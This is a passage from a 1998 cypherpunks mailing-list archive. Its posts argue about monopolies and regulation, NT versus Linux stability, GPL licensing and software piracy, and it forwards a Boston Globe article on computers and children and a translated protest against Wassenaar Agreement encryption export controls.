>> No, we certainly don't live in a free market, we have
>> a mixed economy. We *should* have a free market,
>
>No we shouldn't. The fact that monopolies can exist in this lightly
>regulated economy is ample evidence that the non-regulated or free-market
>theory is nothing more than another pie-in-the-sky utopian dream.
>Unrealistic and unrealizable.

	Crap. In most cases monopolies are GIFTS from the government, where
they  aren't they are either (a) natural monopolies (were the market is too
small to support competition, or there is some other feature of that market
which makes competition difficult or undesirable) there aren't too many of
these, or places where the government (city, state, fed) felt a monopoly
would be of benefit to the citizens. I.e. Gas/power/light companies,
Telephones etc.

	The government was (as usual) wrong.


>If you seriously think this is a heavily regulated market you should do more
>research into such places as Nazi Germany, Russia, China, etc.

	France, England etc.

	We are _going_ that route, with more and more regualtion being
dumped on the backs of businesses daily.

	If you think that registering a DBA is the only step you need to
_legally_ start and run a business, you're smokin crack.

>> are much more destructive and pervasive than any potential abuses by
>> market leaders.
>Monopolies are monopolies, claiming that they will be less abusive in a
>regulated market than in a free-market just demonstrates a lack of
>understanding of basic human instincts.
>You are claiming that if we do away with the food regulations that McDonalds
>will be *more* concerned about their meat being cooked thoroughly then you
>obviously don't understand people who chase the bottem line to the exclusion
>of all else.

	If there were no food regulations, would you eat at Mc Donalds?

	Your life, your choice.

>> Also, the latter abuses are naturally corrected by
>> competition,
>
>If a market monopolizes there is *NO* competition. If the market is one that
>takes a large investment in intellectual or capital materials then there
>won't be any opportunity to even attempt to start a competitive venture.

	Like...Operating systems? Nope, Linux is NO competition for NT,
neither are the free BSDs.

>> The answer for establishing "rules" which insure "fairness," such as
>Fairness is about the consumer, not the manufacturer. This misunderstanding
>(if not intentional misdirection) by free-market mavens is at least one
>indication why it won't work.

	Why shouldn't it go both ways? In a healthy market, the consumers
ARE the manufacturers.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 1 Oct 1998 14:32:19 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: I thought of an initialy regulated industry!... (fwd)
Message-ID: <199810011932.OAA20010@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 1 Oct 1998 21:22:24 +0200
> From: Anonymous <nobody@replay.com>
> Subject: Re: I thought of an initialy regulated industry!...

> > Personally, I favor the "Pournelle Solution": acquire a 10-mile by 10-mile
> > region of the Mojave Desert. Not in an "ecologically interesting" area of

As was pointed out it does rain out there. Though there is a more insidious
issue that makes such attempts worthless.

Here's how it works...

Humidity in the air settles on the materials. Because of the daily
temperature extremes the expansion of this water causes the materials to
break into very small particles. The wind comes along and transports these
particles downwind.

I'll leave the rest to your imagination and a couple of hours with a geology
text on erosion.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 1 Oct 1998 14:45:44 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810010212.VAA16034@einstein.ssz.com>
Message-ID: <v04011704b239892928fa@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:12 PM -0500 9/30/98, Jim Choate wrote:
>Forwarded message:
>> Please elaborate. Netscape works fine on Windows 98, and faces the
>> same restrictions with installation that original Windows 95 had.
>
>No Netscape on NT or 95/98 is no where near as stable as on a Linux or
>Solaris box (the two that I use most). I can't go 24 hours on my NT for
>example without Netscape hanging for some mysterious reason whereas I've
>run Netscape (even on my HP 10.10) for days without a hang and those
>mysterious pauses it's so famous for.

	Netscape isn't as stable on my Mac at work as it is on my Linux
box, so what?

	Nothing is as stable on NT as it is on a (properly installed) linux
system.


>> As for Java, Java works as well on Windows as on any other platform.
>Yep, that explains why my NT's have to be rebooted almost daily because of
>various issues and my various unix boxes go for weeks....yep, that's more
>stable all right.

	Your NT systems are installed improperly then. You should be able
to get at least a week, if not 2 out of them.

>> It's funny how giving the customers more value for their money, always
>> ends up being anti-competative.
>
>How do you figure Win98 gives me more value for my money? I buy Win98 for
>$100 or so, have to have gobs of memory and a damned fast processor to even
>come close to the alternate OS'es.

	Simple, you now have a REALLY nice machine, whereas if you'd have
stuck with Linux, that old 486 would still be a decent machine...

>> network, that they can quickly add a jillion features to any program,
>And just as many bugs.

	Bah, no one cares about bugs.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 1 Oct 1998 14:14:14 +0800
To: cypherpunks@cyberpass.net
Subject: EduFUD: Computers, software can harm emotional, social development
Message-ID: <v04011741b239749c38d9@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



As the FUD snowballs. The Globe gets Rimmed again...

The edutocracy (and the Boston Globe :-)) finally notices that all that
artillery parked at the foot of their ivory tower actually *does* blow
great big rocks into tiny little bits...


In another context, Carl Ellison has this great story about how, when
firearms were invented, peasants could finally kill knights in armor from a
comfortable distance. When the church reminded them that killing knights
was a sin, peasants started killing knights on weekdays and confessing
those sins in church on Sunday.


Frankly, I've learned more on the net in the last few years than I ever
would have in an equivalent time in school. I credit it with a
several-point increase in my IQ, even.

Woops. We don't count IQ anymore, now do we?... :-).


I guess I know too many stone geniuses who've had computers since they were
children -- most of the people on this list were raised that way, I would
bet -- to take this crap too seriously, reduced attention "spans" or not.

By the way, "span" is the wrong word for ADD. I was hardly raised on TV,
much less computers, (I had my face in science fiction books throughout
most of my childhood), and I've been known to focus on something
"inappropriately" for hours.

While I certainly have varying degrees of control of my attention, but I
just don't see that a "handicap" anymore. My attention is event-driven,
rather than processed in neat organized batches, and I've learned to like
it that way, even if it did give me trouble when I was chained in the
aforementioned tower's dungeon for most of my formative years.

Besides, even if computers cause people to have event-driven attention
rather than in nice neat industrial batches, that's probably a Good
Thing(tm). Consider it evolution in action.

Farmers and mechanics may need "control" of their attention, but in an
information "hunter" like myself, most of the people who do anything useful
on the net, it's a selective disadvantage.

Cheers,
Bob Hettinga


--- begin forwarded text


From: Somebody
To: "'rah@shipwright.com'" <rah@shipwright.com>
Subject: FW: Computers, software can harm emotional, social development
Date: Thu, 1 Oct 1998 13:28:41 -0400
X-Priority: 3
Status: U



> -----Original Message-----
> From:	Somebody else
> Sent:	Thursday, October 01, 1998 8:41 AM
> To:	a whole buncha education "professionals"...
> Subject:	Computers, software can harm emotional, social
> development
>
>
>
> Computers, software can harm emotional, social development
>
>               By Barbara F. Meltz, Globe Staff, 10/01/98
>
>               Short attention span. Needs instant gratification. Can't
> focus. Doesn't apply
>               himself.
>
>               If this is what you're hearing from your child's first-
> or second-grade teacher,
>               before you panic and think learning disabilities or
> attention deficit disorder,
>               consider something external: your family computer.
>
>               Educators have long intuited that early exposure to
> computers doesn't give
>               children an educational edge. Now researchers have data
> to show it can
>               actually be harmful, potentially undercutting brain
> development, interfering
>               with the way a child learns, intruding on social and
> emotional development,
>               and putting health at risk. ''There is no reason to give
> a computer to a child
>               under 7,'' says educational psychologist Jane M. Healy.
> If she had her way,
>               she'd throw computers out of preschool and early
> elementary classrooms
>               and keep kids off them at home. Her
> sure-to-be-controversial new book,
>               ''Failure to Connect: How Computers Affect Our
> Children's Minds, for
>               Better and Worse'' (Simon & Schuster), is eye-opening
> reading.
>
>               Many researchers agree with her. ''For children under 7
> or 8 who have not
>               reached the age of abstract reasoning, computer exposure
> changes the way
>               they absorb material. Some of us think this is quite
> frightening,'' says
>               educational policy analyst Ed Miller of Cambridge.
>
>               Technology researcher Douglas Sloan, a professor at
> Teachers College at
>               Columbia University, says, ''It's something of a scandal
> that it's taken us so
>               long to figure this out.''
>
>               Some of the troubling trends Healy identifies:
>
>                 Kindergartners who don't want to draw with markers and
> crayons
>               because ''it isn't as pretty as my computer drawings.''
>
>                 First-graders who are so used to a computer game's
> reward for doing
>               something easy, they don't want to try anything hard.
>
>                 Kindergartners who are nonverbal and don't know how to
> play with
>               peers because of too much time alone at the computer.
>
>                 First-graders who are unable to understand what they
> read because they
>               lack a rudimentary language base they typically get from
> peer and adult
>               interaction.
>
>               ''In putting little kids at the computer, you take them
> away from peer play,''
>               says Sloan. ''That compromises social development and
> imagination.'' Not
>               only that, but a child is being provided with someone
> else's visual images at
>               precisely the time when he needs to be developing his
> own image-making
>               capacities. ''That's what leads to intellectual growth
> later,'' Sloan says. The
>               same thing is true with too much TV time, but studies
> show parents monitor
>               TV more. ''We've come to ascribe almost magical
> educational qualities to
>               the computer,'' he says. He researches how to protect
> children from
>               computer misuse.
>
>               Problems with computer exposure aren't limited to early
> childhood. Bill
>               Schechter, a history teacher at Lincoln-Sudbury Regional
> High School, says
>               he knows the Internet has the capacity to be a
> tremendous tool for research,
>               but so far he hasn't seen how.
>
>               ''I'm getting to the point where I'm not going to accept
> Internet research,'' he
>               says. ''The technology for cheating far outdistances a
> teacher's ability to
>               recognize it. All I'm seeing is lazy Internet use, where
> kids use it as an excuse
>               not to open a book, not to check sources, not to go to
> the library.''
>
>               Software researcher Howard Budin says one of the
> problems is the vastness
>               of the Internet. Last year, his son's sixth-grade
> research project required two
>               Internet sources. ''When he did a search for `panda,' he
> turned up 54,000
>               entries! If I hadn't been there with him, he would have
> been totally
>               frustrated,'' he says. Most of the entries were for
> schools with pandas for
>               mascots, but it took even an experienced navigator like
> Budin a half-hour to
>               get to appropriate sites.
>
>               Budin, who is director of the Center for Technology and
> School Change at
>               Columbia, says exposure to the Internet should start in
> third or fourth grade,
>               not before. ''Introduce it as a source of information,
> not entertainment,'' he
>               says.
>
>               Even so, it can lead to the kind of problems teachers
> like Schechter see.
>
>               ''Who's teaching these kids how to use it and where the
> information comes
>               from and what it means?'' asks Sloan.
>
>               He says that in the rush to wire classrooms, these
> critical questions are
>               largely ignored. ''Data itself is not knowledge,'' says
> Sloan. ''It's only
>               knowledge when you connect it thoughtfully and
> critically to curriculum.''
>
>               In many schools, the problem is lack of human
> infrastructure, says
>               technology researcher Vicki O'Day, of the Xerox Palo
> Alto Research
>               Center. She speaks admiringly of a new principal at an
> elementary school in
>               California who had the courage to shut down the computer
> lab for two years
>               until she had technical support and curricula-links.
>
>               She says a school needs to fund two positions, a
> technology coordinator
>               who keeps equipment up and running and is not a teacher,
> and a curriculum
>               development person who is a teacher but not in the
> classroom. ''You can't
>               expect a classroom teacher to be knowledgeable about
> software and the
>               Internet in addition to what she already does,'' O'Day
> says.
>
>               She also tells schools to put computers in the
> classroom, not in a computer
>               lab; they're more likely to be integrated into the
> curriculum and to be seen as
>               one more tool, along with a dictionary and pencil
> sharpener. ''We used to
>               think kids should do computer just for the sake of doing
> computer,'' says
>               O'Day. ''Uh-uh. It should always be used for a
> purpose.''
>
>               For parents, this means restricting the computer to
> what's useful and
>               forgetting about what's entertaining.
>
>               Healy, who's a purist about this, would limit a young
> child's access to e-mail
>               to write to grandpa, or to sitting on your lap while you
> download pictures of
>               her favorite animal or truck.
>
>               Steve Bennett, who reviews software and is author of
> ''The Plugged-in
>               Parent'' (Times Books), tells parents to think of
> themselves as ''parentware.''
>               He defines that as an involved parent. ''It's just as
> important as software,'' he
>               says.
>
>               In his home, the computer is one resource among many and
> it's not used as a
>               babysitter or as entertainment. He enforces limits on
> screen time - his kids, 8
>               and 11, can have two half-hour sessions a day, after
> homework, although he
>               says they hardly ever use it - and restrictions on
> software: no ''drill and grill''
>               games, shoot'em-ups, or Internet surfing. Budin has
> similiar restrictions for
>               his children; his sixth-grade son spends his computer
> time on spread sheets,
>               graphic programs, and 3-D renderings.
>
>               In addition to setting limits on software, Sloan says,
> parents should avoid
>               what he calls an adulatory attitude toward the computer.
> If your child is
>               young and you're just starting out, ''Look at it as an
> appliance,'' he says.
>
>               And if you already have a 4- or 6- or 9-year-old who's
> hooked on
>               computer games?
>
>               It's never too late to talk about family values, even to
> say you've made a
>               mistake about allowing certain games. ''The ultimate
> challenge and most
>               successful counter,'' says Sloan, ''is to provide such a
> rich environment in
>               your home that the games seem dull compared to whatever
> else is going on.''
>
>               AFTERTHOUGHT - Recommended reading for 3- to
> 7-year-olds: ''How
>               to Take Your Grandmother to the Museum'' (Workman
> Publishing), by Lois
>               Wyse and her granddaughter, Molly Rose Goldman.
>
>               Child Caring appears every Thursday in At Home. Barbara
> F. Meltz
>               welcomes letters and comments and can be reached via
> e-mail at
>               meltz@globe.com.
> hmm!
>
> 	This story ran on page F01 of the Boston Globe on 10/01/98.
>               (c) Copyright 1998 Globe Newspaper Company.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 1 Oct 1998 14:51:17 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Rain in Death Valley (fwd)
Message-ID: <199810011953.OAA20293@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "X" <xasper8d@lobo.net>
> Subject: Rain in Death Valley
> Date: Thu, 1 Oct 1998 13:37:47 -0600

> If the area you refer to is below sea-level, where would the hard-rains
> runoff run off to?

Let me say one word....

watertable

Enjoy drinking the runoff.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 1 Oct 1998 14:53:03 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810011954.OAA20323@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 1 Oct 1998 14:35:28 -0500
> From: Petro <petro@playboy.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> 	Nothing is as stable on NT as it is on a (properly installed) linux
> system.

That is the point after all.

> 	Your NT systems are installed improperly then. You should be able
> to get at least a week, if not 2 out of them.

I'll beg to differ with you.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 1 Oct 1998 14:14:54 +0800
To: cypherpunks@cyberpass.net
Subject: Re: early reports from Austria: possible crypto stalemate (fwd)
Message-ID: <v04011745b2398471f1d5@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


To: cryptography@c2.net
Cc: M Taylor <mctaylor@privacy.nb.ca>, djones@efc.ca
Subject: Re: early reports from Austria: possible crypto stalemate (fwd)
Date: Thu, 01 Oct 1998 14:04:23 -0400 (EDT)
From: Don Beaver <beaver+@transarc.com>
Sender: owner-cryptography@c2.net


M Taylor writes:
> ---------- Forwarded message ----------
> P.S. If anyone happens to be fluent in German, maybe you could help us
>      by translating, or summarizing, in English:
>
> 	http://www.mediaweb.at/akmg/news/wassenaar.html

Disclaimer:

I don't make any claim to real fluency in German (I never took
a class), so there may be mistakes.  But I think this is pretty
accurate.

--Don Beaver

<H2>
Journalist Trade Union Protests the Cancellation
of Special Arrangements for Encryption Programs
in the Wassenaar Agreement
</H2>

<H3>
At a meeting of experts on the Wassenaar Agreement in Vienna,
the cancellation of exceptions for cryptographic public-domain
software and shareware was negotiated.  The real goal of the
agreement is the control and transparency of transfers of military
and so-called dual-use goods - products and technologies that can
be used for both military and civilian purposes.
The Wassenaar Agreement lists Information Security and encryption
technology, in the form of software encryption programs or hardware,
under the Dual Use category 5.2.
</H3>

<P>
There are to be further efforts to eliminate the exceptions for
public-domain cryptographic software and shareware (usually free
over the Internet or by CD-ROM distribution), and thereby place
each kind of encryption software under the monitoring and restriction
of the Wassenaar agreement.

<P>
The journalist trade union is protesting vehemently, because free
access by journalists and the media to encryption programs is
threatened.  Encryption programs play a rapidly increasing role in
the protection of electronic network communications for the media
and jounalists.  It is not difficult to monitor electronic mail
automatically and make copies without recipients or senders ever
taking notice.  Investigative journalism on organized crime,
corruption, and illegal arms trafficking, for example, may be
endangered by the lack of protected communication, because the
privacy of research is not ensured, especially when it takes
place internationally.

<P>
Not only will editorial privacy be damaged but also the protection
of information sources, as well as the protection of the private
sphere.  Not only must the protection of communication between
journalists and media be ensured but also between journalists
and media and their information sources, which cannot be limited
to a special circle of acquaintances.

<P>
Attempts to permit programs that just encode with a key whose
duplicate is placed with authorities cannot provide a way out.
With such duplicate keys, all encoded messages can be decoded.
But there is no guarantee that this duplicate key will not
arrive in the unauthorized hands of organized crime, for example,
or that is it not used by individual members of the authority
or intelligence services in an unauthorized manner.

<P>
The information surrounding the Wassenaar Agreement is also
precarious: at present, each discussion in the Wassenaar Agreement
falls under the privacy of "privileged diplomatic communication"
(Point IX) and the application of resolutions are to be implemented
using "national discretion" (Point II.3).
Thus, the targets of the Wassenaar Agreement are counterproductive(?):
companies whose doubtful weapons shipments were forbidden remain
spared from public criticism, just like failed decisions.

<H3>Therefore the journalist trade union demands:</H3>

<UL>

<LI>
Elimination of cryptography from the list of "dual-use" goods
entered by the Wassenaar Agreement.  No limitation of cryptography
to insecure (respectively, key duplication/escrow) encryption
techniques.

<LI>
Democratic control/monitoring of the Wassenaar Agreement: No modification
of the rules and jurisdiction of the Wassenaar Agreement without prior
public discussion.

<LI>
Obligatory public reporting on activities in the context of the
Wassenaar Agreement.

</UL>

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 1 Oct 1998 15:21:01 +0800
To: Robert Hettinga <cypherpunks@cyberpass.net
Subject: Re: EduFUD: Computers, software can harm emotional, socialdevelopment
In-Reply-To: <v04011741b239749c38d9@[139.167.130.248]>
Message-ID: <v04011706b23992905e2f@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:50 PM -0500 10/1/98, Robert Hettinga wrote:

	If you (and others) are going to forward this kind of stuff, could
you least foucs long enough to make sure it is properly formatted?

	It's a touch difficult to read.

>> Computers, software can harm emotional, social development
>>
>>               By Barbara F. Meltz, Globe Staff, 10/01/98
>>
>>               Short attention span. Needs instant gratification. Can't
>> focus. Doesn't apply
>>               himself.
>>
>>               If this is what you're hearing from your child's first-
>> or second-grade teacher,
>>               before you panic and think learning disabilities or
>> attention deficit disorder,
>>               consider something external: your family computer.
>>
>>               Educators have long intuited that early exposure to
>> computers doesn't give
>>               children an educational edge. Now researchers have data
>> to show it can
>>               actually be harmful, potentially undercutting brain
>> development, interfering
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 1 Oct 1998 17:19:01 +0800
To: "'Kevin Elliott'" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A19284720@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> >Bullshit, monopolies exist because of the regulation.
> 
> I'm afraid sir, that your ingonorance is showing.

Is it?

> Pick up any college (hell, high school) economics 
> textbook.

Yes, why don't we try anyone from the Austrian or Chicago Schools, or
have you not gotten that far in your Econ 101 textbook?

I'll even give you a couple to start with: Friedrich A. Hayek, Ludwig
von Mises, Carl Menger, Adam Smith, Murray Rothbard, Milton Friedman,
Alan Greenspan. You also might try Frederic Bastiat, Ayn Rand. Try
reading some of the studies done by the CATO Institute

No, you can keep your Western Illinois school of voodoo economics to
yourself.

> Certain types of businesses are inheritly advantagious to 
> monopolies.  The electric company is the classic example-

There are very few natural monopolies. Few to none. The sewer system or
local access roads are better examples than electricity -- all
electricity requires is right-of-way access, it is not scarce on
property like roads. Copper/fiber is already run by three separate
entities (phone, cable, electric) to the home and there is evidence to
show that it came be made much for free (see fiber-running in Helsinki).

Right-of-way is the source of the monopoly. Problem is government will
assume it is a natural monopoly and create a coercive one. Take
telephony for example, which is so blatantly obvious today that it is
not a natural monopoly -- yet try getting dry copper circuits and
providing dial-tone and see the mess of regulation you run into.

> Certain types of businesses are suited to certain types of 
> competition, and, unregulated, monopolies are exactly what 
> you get.

Show me an example of an unregulated coercive monopoly whose source of
monopoly power is not ultimately the government. Efficient monopolies
(e.g. ALCOA) exist in early markets, but they are not coercive, they
cannot prevent competition, they can only be efficient enough that they
capital market won't see the returns to justify a second entrant.

> This was exactly the situation that occured at the turn of 
> the century and it happened because regulation was non-existant!

I suggest you question the motivation of your sources. We are living in
the shadow of socialism and big government, who proclaimed the evils of
capitalism and stepped in to save the day. Were they justified?

Read what Greenspan thinks turn-of-the-century monopolists and resulting
regulation: http://www.ecosystems.net/mgering/antitrust.html

	Matt

PS. Your spelling is as bad as Jim's. One starts to wonder if bad
spelling and bad logic go hand in hand.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 1 Oct 1998 15:29:25 +0800
To: Cypherpunks <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A1928471D@mossbay.chaffeyhomes.com>
Message-ID: <v04011707b2399469cd62@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:18 PM -0500 10/1/98, Kevin Elliott wrote:
>Said Matthew James Gering,
>
>>Bullshit, monopolies exist because of the regulation.
>
>I'm afraid sir, that your ingonorance is showing.  Pick up any college
>(hell, high school) ecomonics textbook.  Certain types of businesses are
>inheritly advantagious to monopolies.  The electric company is the classic
>example- their is no cost effective way for an electric company to supply
>power to a given area unless it is a monopoly.  Certain types of businesses
>are suited to certain types of competition, and, unregulated, monopolies
>are exactly what you get.  This was exactly the situation that occured at
>the turn of the century and it happened because regulation was
>non-existant!  Your statement is wonderfully trite but I see no evidence to
>support it.

	I'd suggest you go back to school and think a bit.In most places
the "Electric Company" is a goverment sponsored and deligated monopoly.
Competition is prohibited by REGULATION. This also occurs with Gas, Water,
Telephone, especially Non-commercial, cable, and in some places Garbage
disposal.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Roessler <roessler@guug.de>
Date: Thu, 1 Oct 1998 10:54:27 +0800
To: cypherpunks@cyberpass.net
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199809281845.TAA18662@server.eternity.org>
Message-ID: <19981001154100.D27670@sobolev.rhein.de>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, Oct 01, 1998 at 10:26:39AM +0100, Ben Laurie wrote:

> d) As far as I can work out, someone who wants to free part of a
> product, but not all of it, can't practically do so under GPL.

Wrong.  As long as it's your own code you are talking about, you can
release it under whatever license you want -  e.g., you can give
away binary code as part of a proprietary application, and you can
give away binary and source code stand-alone under GLP, LGPL, BSD
license, Artistic License, whatever.

tlr
-- 
Thomas Roessler  74a353cc0b19  dg1ktr  http://home.pages.de/~roessler/
     2048/CE6AC6C1  4E 04 F0 BC 72 FF 14 23 44 85 D1 A1 3B B0 73 C1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 1 Oct 1998 15:48:32 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: copyright at the point of a gun (fwd)
Message-ID: <199810012050.PAA20791@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 1 Oct 1998 21:27:56 +0100
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: copyright at the point of a gun

> Judging by the state of software-piracy with PC software with 80-90%+
> piracy rates, the market is already pretty much ok with ignoring
> copyright, and would be happy to have no copyrights.

So long as it isn't money your taking out of their pocket. There is an
obvious double standard at play in the piracy issue.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 1 Oct 1998 16:18:50 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810011954.OAA20323@einstein.ssz.com>
Message-ID: <v04011708b2399e0b1085@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:54 PM -0500 10/1/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Thu, 1 Oct 1998 14:35:28 -0500
>> From: Petro <petro@playboy.com>
>> Subject: RE: GPL & commercial software, the critical distinction (fwd)
>
>> 	Nothing is as stable on NT as it is on a (properly installed) linux
>> system.
>
>That is the point after all.
>
>> 	Your NT systems are installed improperly then. You should be able
>> to get at least a week, if not 2 out of them.
>
>I'll beg to differ with you.

	You can beg if you want, but I can keep my Mac up for 3 or 4 days
at a time, you SHOULD be able to get at least 2 weeks out of NT, assuming
your hardware isn't flakey.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 1 Oct 1998 18:08:03 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: EduFUD: Computers, software can harm emotional, social development
In-Reply-To: <v04011741b239749c38d9@[139.167.130.248]>
Message-ID: <199810012307.QAA27055@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I just saw a special on nightline last night in which Koppel
berated his guests for not necessarily agreeing that
computer budgets are too much, and not doing good, possibly
doing bad for kids, and that more research is necessary
before schools commit to computers.

it's totally reactionary, and neo-luddite. it's like saying, "stop the world!!
it's going too fast!! it's making me dizzy!! I want to get off!!"

heck, wasn't it just a few weeks ago the govt was screaming
in a study about how there would soon be a shortage of computer
scientists? the hypocrisy of the establishment is always 
breathtaking and unparalleled.

one researcher said that it was causing kids not putting up
with frustration or frustrating experiences as much.

well, hallelujah I say!! if the sheeple of this country had
less tolerance for the intolerable situations regularly
encountered in schools, govts, business, etc.-- perhaps it
would GO AWAY as they exert their influence and pressure
and displeasure.

imho, the "powers that be" are terrified of computers.
PCs are very egalitarian and are creating a new revolution
in information flow and economies. a student who understands
how to navigate through the world of knowledge without  a
chaperone is a dangerous, freethinking individual in
our current stifling, asphyxiating intellectual atmosphere.

the whole image of parents limiting how much their children
can surf the net is quite amusing to me. it's like trying
to push a river.

computers have shown up on the radars of the "powers that
be" as having an alarming effect on the people that use them.
perhaps they are less likely to tolerate crap in their
lives? less tolerant of worthless "middlemen", or less
politely, parasites?

forgive me if I may be a bit more sharp here.
there are many, many parasites feeding off the crap of
our culture, and they don't want that crap to dry up.
but cyberspace has a remarkable ability to cut through
the crap and the parasites. "the speed of cyberspace"...
a new speed limit in the world. or rather, a new
breakdown in all previous limits. a speed UNLIMIT.

oh, the terror! kids might even get bored with our cultures 2 great
opiates: sports and entertainment.  who knows what will
happen then?  tyranny is held in place by frivolous and
meaningless pastimes and amusements in our world.

fortunately, PCs and the internet are now an unstoppable
force. we will see soon what happens when it meets many
"immovable objects" such as govt ineptitude, intransigence,
entrenched control freaks, slavemasters, etc.....
PCs are definitely becoming a political and social force now.
not all effects are positive, but it's creating a new
reality I vastly prefer to the old, shriveled up one.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
